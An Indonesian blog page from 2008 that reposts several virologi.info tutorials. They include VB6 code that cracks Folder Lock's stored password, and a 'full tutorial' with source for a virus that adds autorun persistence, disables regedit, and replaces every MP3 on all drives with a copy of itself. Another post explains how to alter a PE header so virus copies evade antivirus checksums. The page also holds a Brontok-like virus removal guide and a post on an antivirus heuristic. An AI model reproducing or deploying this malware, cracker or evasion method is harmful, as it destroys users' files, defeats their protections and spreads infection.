Rabu, Desember 10, 2008

Seni Menebak Password Pada Folder Lock 5.2.8

Mungkin judulnya terlalu mengada-ada maklum gw masih newbie yang masih harus banyak belajar!!! Untuk itu tulisan ini Cuma buat yang masih newbie, bagi yang udah mahir saran gw gak usah diterusin (Cuma Saran..>>$-A


Aplikasi ini dibuat pake VB6 (“kalo gak salah”) Kemampuannya sesuai dengan namanya yaitu untuk mengunci atau menyembunyikan folder, file maupun drive!!! Hanya dengan meng-Cut-Paste kan folder atau file yang ingin disembunyikan in directory “Program Files\Folder Lock\Locker”!!! dan hanya bisa dibuka dengan Password yang valid!!! Truz kalo kita lupa or gak tau passwordnya gimana??? Tenang2x, apa’an sich yang gak mungkin di Dunia ini, Preman aja bisa insaf (iya gak???) Nah yang kita perlukan untuk experimen kita kali ini :

• Folder Lock 5.2.8 cari aja di Abang Google (“Gw pake versi trialnya”)
• Regmon v6.06 cari juga di Abang Google
• Rokok biar gak dikata culun!!!hehe33x!!!

Let’s go kita berexperimen sekarang :
1. 1st, install dulu folder locknya, selesai install program langsung launch, nah kita disuruh isi passwordnya, karna ini Cuma experimen gimana kalo kita isi dengan “abcd” klik Set lalu isi sekali lagi kemudian klik Ok lalu klik lock, program tertutup dengan sendirinya. Kaya yang udah gw bilang kita Cuma experimen, anggap aja kita lupa Passwordnya, pura2x lupa ghitu. Jalanin lagi programnya kemudian isi dengan “4L13N” klik Ok alhasil diomelin, karna passwordnya invalid.




2. Sekarang coba buka registry editor “HKLM\SOFTWARE\Folder Lock\Logs”. Lihat, disana terdapat informasi di string Log1 yaitu “N31L4-on blablabla” coba perhatikan, itu adalah password salah yang kita masukan tadi tapi terbalik (“N31L4 DIBALIK 4L13N”) mungkin itu salah satu enkripsi password pada program ini. truz passwordnya dimana??

3. Next… sekarang coba jalanin program Regmon, pilih menu Option-Filter\Highlight…. Ato tekan (Ctrl+L), muncul kotak dialog, pada text Box Include ketik "folder lock.exe" tanpa kutip lalu klik Ok. Next jalanin Folder Lock, coba lihat regmon banyak sekali registry yang diUpload. Untuk mempermudah pilih menu Edit-Clear Display ato (Ctrl+X), kembali ke folder lock, coba masukan sembarang password lalu enter, coba lihat lagi di Regmon, kita sudah dapat informasi yang berharga disini. (“Apa Mungkin Passwordnya Ada disana?”)



4. Lanjut… Nah sekarang kita Running keRegistry editor buka key tersebut, ternyata benar, ini dia yang kita cari di string _pack tertulis “edcb~~~~~~~~~~~~~”, masih ingatkan password yang kita input tadi “abcd”, Loh kok beda??? Jawabannya adalah enkripsi!!! Masih ingat enkripsi dinomor 2, oke kita coba “edcb DIBALIK bcde” loh kok masih beda?? Sedangkan passwordnya “abcd”!!! perhatikan sekali lagi pake logika anda!!! Ya benar setelah dibalik menjadi “bcde”. Sekarang kita coba hurup apa sebelum hurup tsb. “b” hurup sebelumnya yaitu “a”, kemudian “c” hurup sebelumnya yaitu “b”, kemudian “d” hurup sebelumnya yaitu “c” dan terakhir “e” hurup sebelumnya yaitu “d”, Jadi kalau digabung menjadi “abcd”. Lalu gimana dengan tanda dibelakangnya?? Itu hanya sebuah penanda sebagai sisa karakter yang boleh kita input sebagai password!!! Tidak percaya ?? coba anda change password dengan tanda tsb ato lebih dari semua karakter yang ada disana, menurut perhitungan gw 16 digit/char. Gw bisa pastiin anda bakal diomelin!!! Kaya yang udah gw bilang kita Cuma experimen.

5. Nahh Sekarang kita Udeh tau neh letak password dan logika encrypt_Nya, gimana kalo kita bikin cracker_Nya?? Setuju ga??? Gw harap pada setuju!!!oke kita bikin pake bahasa pemrograman apa yach????untuk memudahkan kita dalam belajar gimana kalo kita bikin pake bahasa pemrograman yang paling mudah N yang paling familiar bang’Get(menurut gw)>>-A

Iya bener kita bikin pake VB.6.0 oke!!!siapkan sebuah project baru dengan :
• 2 buah TextBox dengan nama Text1 dan Text2 yang text-Nya kosong N Text1 diset eneble_Nya False
• 1 buah CommandButton dengan Caption “Klik Aku Untuk Lihat Password”
• 1 buah Module dengan nama default_Nya
• 2 buah Label

Hingga tampilannya kaya’ gini :




Oke sekarang anda tulis kode ini di Module:

1. Const ERROR_NO_MORE_ITEMS = 259&
2. Public Const HKLM As Long = &H80000002

3. Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
4. Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
5. Private Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

6. Public Sub Bobol_Coy(ByVal hKey As Long, RegGw As String)
7. Dim alien As String
8. Dim keren As Long
9. Dim banget As Long
10. Form1.Text1.Text = ""
11. If RegOpenKey(hKey, RegGw, keren) = 0 Then
12. alien = Space(255)
13. banget = 255
14. If RegEnumValue(keren, 0, 0, 255, 0, ByVal 0&, ByVal alien, banget) <> ERROR_NO_MORE_ITEMS Then
15. If banget > 0 Then Form1.Text1.Text = Left$(alien, banget)
16. Else
17. Form1.Text1.Text = "Terjadi kesalahan data restart program"
18. End If
19. End If
20. RegCloseKey hKey
21. End Sub

Kode Ini di Proyek Kode

1. Private Sub Form_Load()
2. Dim Reg As Long
3. Dim alamat As String
4. alamat = "Software\Microsoft\Windows\QualityControl"
5. Reg = HKLM
6. Bobol_Coy Reg, alamat
7. End Sub

8. Private Sub Form_Unload(Cancel As Integer)
9. MsgBox ("Salam Hangat By. 4L13N" & vbCrLf & "here_4l13n@yahoo.com"), vbExclamation, "4L13N_Was_Here"
10. End Sub

11. Private Sub Command1_Click()
12. Form_Load
13. Text2 = ””
14. Dim gw As Integer
15. Dim keren As String
16. Dim Bangget As Integer
17. If Text1 = "" Then
18. MsgBox "Maaf Password Tidak ditemukan??", vbInformation, "4L13N_Was_Here"
19. Exit Sub
20. End If
21. For Bangget = 1 To Len(Text1)
22. gw = Asc(Mid$(Text1, Bangget, 1))
23. If gw = 126 Then GoTo Lompat
24. gw = gw - 1
25. keren = Chr$(gw)
26. Text2 = keren + Text2
27. Next Bangget
28. Lompat:
29. End Sub

Logika Program:
Ketika progam pertama kali dijalankan maka program akan mencari data pertama yang ada di alamat registry yang telah ditentukan di dalam badan program dengan menampilkan isi data tersebut dalam TextBox atau Tetx1 dengan menggunakan fungsi API Windows!!!
Setelah Command1 di klik program akan melakukan looping sebanyak jumlah karakter yang ada pada Text1 dan mencoba untuk membacanya satu per satu kemudian merubah_Nya ke_Ascii jika nilai ascii sama dengan 126 program selesai melakukan looping jika tidak terus looping lalu nilai ascii dikurang satu dan data tersebut di_ubah kembali kedalam character, lalu data tersebut diletakan kedalam Text2 dengan nilai tersebut di tambah data Text2 dan seterusnya hingga selesai…
(Mudah-mudahan jelas yach….)

Penjelasan Coding :

Module:

No 1-5 : fungsi Win API32 untuk membuka,menutup dan membaca registry beserta handle-handle_Nya….(“Untuk lebih jelasnya Download program AllApi cari di Abang Google ato cari buku yang ngebahas tentang WinApi32”)
No 6 : membuat public fungsi yang bisa dipanggil ato dicalling kapan aja.
No 7-9: Pendeklarasian variable alien dengan tipe String sedangkan variable keren n banget bertipe Long
No 10 : mengeset nilai Text1 yang ada di Form1 menjadi kosong.
No 11-19: melihat kondisi apakah nilai RegOpenKey dengan pegangannya nilai variable hKey,RegGw,kern bernilai ato sama dengan nol jika tidak program akan melompat ke_no 18 jika ya maka variable alien dinilai sebagai Space(255) n variable banget dinilai 255 kemudian program akan bertanya apakah RegEnumValue dengan pegangannya nilai variable keren,0,0,255,0&, ByVal variable alien n banget tidak sama dengan ERROR_NO_MORE_ITEMS. Jika tidak program akan melompat ke_No 19, jika ya maka program akan bertanya lagi apakah nilai variable banget yang telah dideklarasikan lebih dari nol jika tidak maka lompat ke_No 16 jika ya, maka Text1 yang ada didalam Form1 diset dengan nilai text_nya adalah nilai dari variable alien sebanyak nilai variable bangget dihitung dari kiri.(jelaskan)contoh: “jika nilai alien=coba n nilai banget=3 maka isi text1.text sama dengan cob”
No 20-21:Menutup registry dengan nilai variable hKey dan selesai

Proyek:

No 1-10: menentukan variable reg dengan type long n variable alamat dengan type string kemudian mengisi nilai variable reg dengan HKLM dan variable alamat dengan nilai "Software\Microsoft\Windows\QualityControl" kemudian akan memenggil fungsi yang terdapat dalam module1 yaitu fungsi Bobol_coy dengan mendeklarasikan nilai variable Reg sama dengan nilai variable hKey n variable alamat dengan nilai variable RegGw. Yang bertype sama.
No 11-16: memanggil private fungsi pada Form_Load ato menjalankan perintah dari No 1-10 kemudian mengset nilai Text pada Text2 menjadi kosong lalu mendeklarasikan variable gw,Bangget dengan type integer dan keren dengan type String
No 17-29: Program akan bertanya apakah Text1 sama dengan kosong jika ya maka muncul pesan dan selesai jika tidak maka looping dengan variable Bangget dengan perulangan dari satu sampai jumlah Text pada Text1 kemudian mementukan variable gw dengan data Text pada Text1 yang dihitung pada nilai perulangan(Variabel Bangget) dan diambil sebanyak satu yang kemudian di_ubah kedalam bentuk Ascii lalu program akan bertanya lagi apakah nila dari variable gw sama dengan 126 jika ya maka selesai jika tidak maka nilai dari variable gw dikurang satu, kemudian variable keren diberi nilai dengan data pada variable gw yang diubah kebentuk karakter dan mengeset Text pada Text2 dengan nilai data keren ditambah Text pada Text2 begitu seterusnya hingga proses looping(perulangan) selesai….

Sebenarnya kode diatas bisa dipersingkat lagi tapi untuk lebih memudahkan untuk dimengerti n satu hal lagi kalo penjelasan kode diatas ada yang salah ato berbeda dengan anda mohon pencerahannya coz gw masih newbie abizz!!!!
Penutup
Tulisan ini hanya untuk tujuan pendidikan duang’s, oleh karena itu gw tidak bertanggung jawab apabila disalahgunakan. Semoga dengan adanya tulisan ini para developer software lebih memperhatikan sisi keamanan pada aplikasinya.
Diambil dari www.virologi.info

FULL TUTORIAL MEMBUAT VIRUS MP3 UNTUK MENGURANGI PEMBAJAKAN LAGU

Huehehehehe...tiba2 kepribadian jahat saya muncul....(setan bertanduk lageeee)....kali ini kita akan membahas pembuatan virus penghancur mp3...loh loh loh...mas...kok gitu...hehehehehe...iya neh...kebetulan para seniman terutama pencipta lagu kita sedang dilanda stress karena lagunya dengan seenaknya dibajak oleh para user seperti kita...Muahahahahaha!....ya iyalah kalo gak pakek musik saya juga bisa mati kalau sedang melakukan programming...JADI YAH BAJAK SAJA!!!!


Virus MP3 virii

Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda...yaaaaaaa....gak enak dunk...lah namanya membuat virus ya buebas dooo....masak mau ditahan2....hueheheheheh...., ciri2 yang dari virus ini adalah :

1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif

bisa dilihat pada code dibawah ini:

Dim titik As String
titik = """"

CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide

2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :

'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer

'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If

' frmMain.Visible = True



End Sub


Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer

Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String

For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:

'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")

'Screen.MousePointer = vbHourglass

'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long

fPath = AddBackslash(Path)

Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern


hFile = FindFirstFile(fName, WFD)

On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If

If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If

If SubFolder Then


hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If

While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then


GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend

End If
FindClose hFile
'Set li = Nothing



'Screen.MousePointer = vbDefault

End Sub

Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.

-------------------------------TIPS SETAN-----------------------------------

COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------

Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.

Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!



Diambil dari www.virologi.info

NAKALNYA VIRUS YANG MIRIP BRONTOK

hi...ketemu lagi.....virus - virus banyak bertebaran di ruang angkasa....semakin lama semakin nakal para virus ini. Ada yang menghapus file, ada yang menyembunyikan folder. Nah sama kayak virus yang emang mirip brontok ini.



Kok bisa mirip brontok sih mas? Iya...coba lihat gambar berikut ini, jadi file virusnya mempunyai icon berwarna kuning dengan nama file sama dengan folder, folder yang ada di drive anda. misalnya anda punya folder bernama "My Documents", maka virus ini akan membuat file virus dengan nama "My Documents.exe".





CIRI - CIRI YANG TERKENA VIRUS

Ciri - ciri komputer yang terkena virus ini adalah:
1. Menu Run, Search disembunyikan
2. Regedit dan MSCONFIG tidak dapat dibuka
3. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus
4. Muncul user bernama Ign. Basuki
5. Di My Documents Muncul file :
- Data Ign. Basuki.exe
- Lagu - Server.scr
- Love Song.scr
- New mp3 BaraT !!.exe
- Norman virus Control 5.18.exe
- Windows Vista setup.scr
6. Di direktori C:\Documents and Settings\ ada direktori bernama Ign. Basuki, karena virus membuat user Ign. Basuki

UNTUK ITU BERHATI - HATILAH BAGI PARA ADMIN YANG MEMPUNYAI KOMPUTER SERVER DAN TERKENA VIRUS TERSEBUT. VIRUS INI MEMBUAT USER Ign. BASUKI. MAKA KOMPUTER YANG TERINFEKSI, ATAU SERVER ANDA DAPAT DIMASUKI OLEH ORANG LAIN DENGAN USER Ign. BASUKI---------------------------------------------------------



FILE INDUK VIRUS

File induk virus terletak di :

C:\WINDOWS\ dengan nama file p096743.exe
C:\Windows\ dengan nama file EmangEloh.exe

Sedangkan file lainnya bernama :

jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com


REGEDIT

Virus mengubah beberapa nilai registri di:

Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
T085

Value:
p096743.exe

Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
T085

Value:
jb3248432.exe

Alamat:
Hkey_Local_Machine/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
System

Value:
C:\Windows\EmangEloh.exe


PESAN SPONSOR

Pesan sponsor yang ditampilkan oleh virus seperti tulisan di bawah ini:

MoonligHt[A]



they still hurt me ..

in the Moonlight , ill die

i can't wait tommorow ,

it's so much to long

goodbye Sickness



Specially to LanElitta

Gw Sadar Kalo Kitamemang tidak bisa bersatu di dunia fana : (

sekarang bagi gw kematian begitu indah di mata gw

by | HellSPAWN |

wah wah wah...manisnya.....hiks hiks jadi pengen nangich....



PENANGGULANGAN

1. Download ShowKillProcess.exe di www.virologi.info/download/
2. Jalankan ShowKillProcess.exe, cari nama process di bawah ini dan kill :

p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com

3. Dengan memakai WAVBeta update terbaru, Scan File Virus tersebut, terutama di direktori:
- My Documents
- C:\Documents and Settings
- C:\Windows\

4. Cari File dengan nama di bawah ini dan hapus:

p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
Data Ign. Basuki.exe
Lagu - Server.scr
Love Song.scr
New mp3 BaraT !!.exe
Norman virus Control 5.18.exe
Windows Vista setup.scr

5. Cari file aplikasi dengan besar 42 kb dan punya icon direktori berwarna kuning.

6. Buka MSConfig dan hilangkan tanda centang pada nama Ino
7. Login Sebagai Administrator, hapus user dengan nama Ign. Basuki
8. Kemudian Hapus Folder Ign. Basuki yang ada di C:\Documents and Settings

Virus Header Modifier

Sudah baca buku seni pemrograman aplikasi Xtreme coding menggunakan Visual basic oleh A.M. HIRIN ? Kalo sudah pasti tau dong Program Header Modifier dan apa funsinya? Sejenak mengingat tutorial di virologi yang telah saya buat tentang AV vs VM dimana sang AV menggunakan database string ceksum CRC32 dalam mengenali sebuah file. Jika file tersebut terdaftar dalam database string ceksum CRC32 maka file tersebut digolongkan virus dan AV akan melakukan proses pemusnahan (delete).



Mengapa para AV menggunakan teknik ini? Alasan pertama yang saya ambil karena proses copy-paste. Sebuah file jika di copy kemudian di paste maka dengan kata lain akan terjadi duplikat yang sama persis baik wajah,karakter,ukuran, jenis ataupun wataknya. Kemudian AV menggunakan cheksum CRC32 atau MD5 untuk mengenali ceksum dari virus dan peranakannya.


Lalu apa kaitannya dengan buku yang saya sebutkan di awal? Jelas ada kaitannya, disini saya akan mengembangkan project dari mas HIRIN, hehehe boleh yam mas….? Tunggu project itu fungsinya apaan? Fungsinya adalah untuk memodifikasi sedikit data yang ada di bagian awal suatu file PE atau pun file berekstensi .exe .Maksudnya apaan sih? Singkat kata memodifikasi string cheksum suatu file .exe . Wah jangan-jangan mau dikembangkan jadi virus nih? Hehehe....ga kok ga salah maksudnya tapi ga segitunya kok.Next…apa yang kita butuhkan? Logika? Sedikit teknik? Dan sedikit cemilan kali lihat project tersebut:



Lihat logika alur jalannya program, ternyata program berjalan setelah kita menentukan dimana alamat file .exe yang akan kita rubah, lalu kita mengeksekusi/ merubah ceksum dengan menekan tombol modify? Lalu apa yang harus dilakukan? Tolol masi tanya aja ya dibuat pengalamatan langsung, Ga Usah Nulis-nulis Gitu? Gimana caranya biar alamatnya bisa kedaftar sendiri? Wah tanya mulu lo dengerin dulu lihat object apa aja yang di pakai,yang perlu dicermati Textbox = Text1 nah disini kita perlu mendifinisikan/ mendaftarkan alamatnya


Text1.Text = " D\Bokep.exe "


Lalu lakukan pemanggilan fungsi Modif (pada modul) berfungsi untuk meng-injeksi/memasuukan data yang sudah ditentukan sehingga dapat mengubah ceksum CRC tanpa merusak jalannya program.


Modif Text1.Text


Disini kita akan ubah ceksum CRC peranakan virus dengan nama Bokep.exe terletak di Drive D


Wah apa harus gitu? Ga juga,klik aja textbox-nya lalu cari bagian properties –alphabethic-text isi dengan alamat tersebut,hasilnya sama aja kok. Trus gimana biar ga pencet tombol? Ya dibuat load langsung bisa dengan timer atau dengan Private Sub Form_Load.



Kok Cuma satu? Aku kan pengennya banyak peranakan yang aku rubah…wuh…masak harus aku ajarin? dah…mulai dari logika pertama apa? Textbox =tempat alamat virus lha terus? Tolol..ya tambah textbox-nya, lalu tambah Script untuk perubahan ceksum CRC-nya….O.gitu ya..(AH…OH….mulu lo…)


Dengan modul yang sama seperti gambar berikut:



Tapi kok formnya keliatan gitu ga seru ah? Ya tinggal tambahin Form1.Hide.Untuk source peng-copy-an virusnya ga usah aku terangin ya da pada tau semuakan..lagian ga baik nerangin yang kaya gitu (huehuehue….)jalankan program….kok ga da apa-apa?iya mang dibuat gitukan… lalu cek ceksum CRC32nya dengan CRC generator misal virus induk ceksumnya : 94ADC1FA lalu seksum virus peranakannya setelah dimodif menjadi: F6E7B891 wew…sukses..dengan begini peranakan virus memiliki ceksum yang berbeda dengan induknya dan tidak mengubah kinerjanya ( tp lolos dari scanning AV )hehehe…


Sebenarnya ada satu cara lagi agar ceksum induk berbeda dengan ceksum peranakannya, yah seperti pemikiranku yang dulu yaitu bikin peranakan dengan ukuran size yang berbeda tapi tidak mengubah kinerjanya jadi kinerjanya harus sama seperti file induknya wew……


Segala Penyalahgunaan adalah dalam rangka pembelajaran,Saya tidak bertanggung jawab atas tindakan ataupun perbuatan anda.

Diambil dari www.virologi.info

Senin, Desember 08, 2008

ArrS, Heuristic Licik untuk Deteksi Virus ! by AM HIRIN

Hii ALL,kali ini aku akan coba sedikit kasih informasi tentang sebuah Heuristic yang baru selesai aku tulis. Hmm.mmm.., moga aja informasi berguna baik untuk kejahatan maupun kebaikan.

Apakah itu ArrS ?
ArrS atau kependekan dari Auto xxx read System adalah sebuah teknik heuristic Antivirus untuk mengenali ratusan virus bahkan ribuan virus tanpa database secara temporary ( artinya suatu saat berbeda – beda sesuai kasus tertentu) dengan mengambi informasi yang diberikan si Virus itu sendiri ( licik banget gak sech ), Teknik ini dibuat untuk membantu User yang ingin mendapatkan Antivirus tanpa Update dengan database yang terbaru,karena sifat dari ArrS ini sendiri mengambil informasi yang diberikan oleh virus sendiri ( Ko’ bisa yach …, bisa aja kali yach )
Sebenarnya teknik ini sangat simple dan praktis untuk dibuat, hanya saja kebanyakan dari para enggineer Antivirus belum menyadari akan hal tersebut, padahal mereka tahu bahwa setiap virus akan memberikan informasi kepada system / user agar mereka dieksekusi baik secara sengaja maupun secara tidak sengaja. Dan yang lebih mengejutkan lagi, ArrS hanya membutuhkan tempat sekitar 20-25 baris jika ditulis dalam bahasa Visual Basic dengan algoritma saya. Memang benar jika seorang pepatah dari jawa bernama strReverse(“IEM”) mengatakan “Ilanging nyawa bisa seka methune lambe ( hilangnya nyawa bisa datang dari perkataan )”, kata-kata ini yang mendasari dibuatnya ArrS ( Lhoo apa hubunganya ), hubunganya begini : Seperti yang telah saya katakan bahwa ArrS mengenali virus dari informasi yang diberikan virus itu sendiri, sehingga si Virus bisa dibasminya – jelaskan maksudnya dengan maksud pepatah tadi. Okay dech, mungkin penjelasan dan basa – basi tentang ArrS cukup sampai disini kita akan coba melihat bukti dan manfaatnya secara langsung !
Manfaat ArrS !
- Memungkinkan pengguna Antivirus membereskan virus tanpa repot – repot mengupdate database kecuali kasus virus tertentu
- Mencegah serangan virus ( hampir semua virus ) via flahdisk
- Membantu membereskan unknown virus yang terlanjur mengakar di computer dengan bantuan flashdisk
- Kecepatan Antivirus meningkat drastis jika hanya menggunakan level cek ini saja
Kekuatan ArrS
Pada dasarnya kuat tidaknya penerapan teknik heuristic ArrS pada sebuah Antivirus dipengaruhi hal – hal berikut
a. Ceksum yang digunakan dengan ArrS ( M-31 Pattern G.1 pada ArrS saya )
b. Logaritma pembacaan informasi yang diberikan Virus
Fakta tentang ArrS
Nah kali ini saya akan berikan bukti tentang kemampuan licik ArrS G.1 yang telah saya terapkan pada sebuah Antivirus Lokal ( Kendal AV S.E 2 ) untuk mengatasi virus yang belum dikenali oleh Antivirus Tersebut sebelumnya ( Nb : Virus yang diujikan menyerang beberapa laptop milik SMA 1 cepiring, dengan pertahanan AVG ), setelah saya selesai menulis ArrS pada KAV S.E 2 maka saya menjalankan virus tersebut kekomputer saya, lalu saya tunggu beberapa menit ternyata Virus itu sudah berbuat ulah di computer saya yang nota bene masih Pera…..tit..tit..(Sensor), dan mulai memblokir akses ke registry,MsConfig,Antivirus Luar, dll. Akhirnya saya tancapkan Flashdisk ke computer agar dia juga menyerangnya,lalu saya Scan dengan KAV S.E 2 dengan hasil sbb:
Scan Pertama !



Wow.. ternyata flash saya telah diinfeksinya, dan KAV S.E 2 mampu mendapatkan virus tersebut dengan mudah tanpa menggunakan database ( lihat objek sytem.exe dan artikel ku.exe ), lalu karena saya menggunakan ArrS ini sebagai pembersihan maka untuk memastikan computer saya terbebas dari virus tersebut maka saya melakukan Scan ulang di Flash saya tersebut,
Scan Kedua!
Hasil Scan kedua kalinya pada Flash saya adalah sbb :





Lihatlah KAV S.E 2 dengan ArrS nya mendapatkan satu mahluk lagi yaitu: Mssmsgs.exe yang berada pada dir WINDOWS\system32,objek tersebut sebelumnya merupakan process utama virus yang tidak diketahui tersebut, dan segera bisa terdeteksi setelah KAV dengan ArrS mendapatkan informasi dari kawan-kawanya yang terdeteksi saat Scan Pertama (Licik Kan !).
Kelemahan ArrS !
Tidak dapat dipungkiri bahwa segala sesuatu didunia punya kelebihan dan kekurangan, seperti halnya saya paling enggak tahan banget kalo digoda wanita cantik gak pake Bra.. (ha9x) begitu juga ArrS G.1 yang ada pada KAV S.E. Tanpa bermaksud menutupi kekuranganya berikut saya berikan kelemahan ArrS G.1 ini
a) Mengenali 1 jenis Unknown virus pada setiap Sesion Scan, secara temporary. Padahal ini bertujuan agar tidak membengkakan databasenya.
b) Belum mampu mendeteksi file2 yang terinfeksi virus ( untuk induknya sudah ) dengan high level technique seperti (Alman dan Sality) karena masih menggunakan ceksum M-31 dan belum dipadukan dengan PC’s yang telah ada pada KAV S.E
